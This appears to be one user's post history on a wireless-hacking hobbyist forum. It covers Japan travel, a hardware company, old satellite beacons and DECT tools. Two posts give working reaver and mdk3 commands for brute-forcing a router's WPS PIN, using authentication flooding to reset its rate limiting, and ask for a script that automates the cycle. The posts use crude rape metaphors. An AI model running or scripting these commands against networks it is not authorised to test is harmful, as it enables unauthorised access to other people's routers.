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Posts posted by LexMichdeappel

  1. I've got about three weeks to spend there, what do you guys think I really shouldn't miss out on? Never been there before, so pretty oblivious to what is coming to me...

    Booked a few nights of Tokyo, Osaka, visiting the island Okinawa... Also have a JR rail pass to get around... Is Kyoto any good? Or should I go for an extra round of Tokyo?



  2. To all those that are whining about "customer service" and/or the "we want value for money" boys; you're not only giving your money for the hardware, you're also supporting innovation. You're supporting a good cause, see it as a way you can make Unicef keep doing what they do. But without the CEO that fills his pockets with $1000000 a year.

    Besides that, they have given us more updates for the hardware then Linksys, Netgear and Belkin did combined for all of their stuff in the past year...

    And not only you get the best piece of hardware you yourself never could come up with, they also are giving you a weekly dose of technolust, and everything that surrounds that. Have you ever seen a company that gave you as much bang for buck than these bunch? No you haven't. It's absurd how much heart they put into their product, it is pure love and dedication. You can't even compare it to another company, these are the people we need more of in the world, make sure they can keep doing what they do.

    • Upvote 9
  3. I came across something I think is really awesome and I'm sure there are some of you you also are freaked out by this little gem.


    So there are sattelites up there that should have been crashed, but somehow didn't (because of comm failures and such) and are still beaming stuff around.

    Although these satellite’s batteries have long been expired, because of some sort of chemical reaction due to thousands of failed recharge cycles the batteries begin to conduct over time and allow the satellite to be powered directly from the solar panels thus activating the transmitter.

    Some more interesting stuff: http://mdkenny.customer.netspace.net.au/emitters.html

    Launched on 13 Dec 1964 as the second operational TRANSIT spacecraft, it should be more correctly called OSCAR -2, O-2 or NSS 30020. Unfortunately, the navigation system failed within 2 weeks of launch. The telemetry beacon can be CW or modulated depending on solar lighting conditions. The PAM data is 35 steps with a repeat cycle of about 12.5 seconds. Each step has a duty cycle of about 75% data value and 25% return to centre frequency value. These steps vary a 5400 Hz centre frequency sub carrier oscillator, IRIG 10, that then frequency modulates the RF carrier. Another SCO at 10.5 kHz, IRIG 12, is sometimes present. It has a pattern of five pulses with gaps, followed by a longer gap at about a 1.5 Hz rate. A SSB receiver will resolve, separately, the carrier as a single tone and each of the sidebands as "musical" tones.

    So this 50 year old piece of space "scrap" can still be heard!

    Hoping to see some more results coming in from other RF enthousiasts. ADS-B is for pussies!

  4. Xrad I know of this repo but wanted to make sure I am not missing anything. I just ordered a card and will wait for it to come in then start testing my phone with it and see, hopefully it's the correct chipset.

    Lex I believe I looked all over kali and found zilch that has to do with dect and there is an open ticket begging kali developers to add dect to kali.


    Just checked if my book was still right, unfortunately dedected isn't in the repository anymore. I have some kind of .iso stacked somewhere, but don't know where. I'll check it out for you and try to share as soon as I find it.

  5. I'm not an expert in python, but it's pretty easy to learn.

    I would recommend learning python first, but maybe learning is by doing hehe :)

    I'll look into it though. I have spare tim this weekend. I want to make a script to make my life easier.

    There are several python modules to interact with the terminal and controlling applications such as Reaver.

    That would be awesome. Especially if you do a little tiny bit of explaining how the script works. I don't really care if I crack open the router, I want to be able to understand how it's done.

    I found out the router starts complaining after 21 tries and after that it locks up. The mdk3 command only needs a few seconds of time to reset the router, I always ctrl-C when it hits 3000 clients connected. After that it's back to reaver again. I found out that " reaver -i mon0 -b [MAC] -vv -S -a -g 21 " works best. I added -c 1 to it, but I saw the router hop channels a few times. Went from channel 1 to 11 after having the backdoor raped by mdk3 a few times, so I sat there waiting for beacons that were not going to come anymore.

    I think reaver should come with some of those mdk3 functions embedded. When it hits the limiter, automatically switch to mdk3 and rape it.

    I guess I'm going to have to watch some more of that Coding 101 with Snubs and that Christian guy...

  6. More and more routers are becoming resistant to the Reaver magic. That's a good thing, because we all want easy and secure working hardware in our (grand-)parents' homes. But are they really secure? Today I had an encounter with a stubborn fellow that tried to stop me from brutally forcing myself into his backdoor.

    WARNING: Detected AP rate limiting, waiting 60 seconds

    Good job boy, you kept me out, you're safe! Yeah right... So I fired up another command:

    mdk3 mon0 a -a [MAC] -m

    Let that rip for a minute, tried reaver again, bingo! It accepted my brute force methods again. But after a few minutes it locked up again. Time for some more of that mdk3 vaseline, let it rip again, and after reavering it accepted my crowbar.

    Now my question is, can someone explain to me or show me how to write some kind of script that does this automatically?

    So it should do this on it's own:

    reaver -i mon0 -b [MAC] -vv -S

    When it hits the AP rate limiter: ctrl-C

    mdk3 mon0 a -a [MAC] -m

    Run that for a minute or something and then again from the top:

    reaver -i mon0 -b [MAC] -vv -S

    When it hits the AP rate limiter: ctrl-C

    mdk3 mon0 a -a [MAC] -m

    And so on and so on and so on...

    • Upvote 1
  7. No Problem... I also have a Galaxy Nexus that I have use and karma is able to trick it into connecting. Are you sure that you are looking at probes in airodump-ng and not beacons? You will usually see a probes at the bottom of airodump-ng. It usually just shows one probe per ssid for me. Let me know if you have any other questions ;)


    Yes, it shows up in the bottom list of airodump-ng. Maybe I'm not seeing it in the pineapple, I'm still figuring out all kinds of stuff. Just got it upgraded to 2.7.0 and figured out I had to change login-ip/port. Installed a few modules that were available in the Pineapple Bar tab. Will post if there's more to ask.

    For now I'll take your word for it that my G_N is vulnerable ;) . Better safe then sorry!

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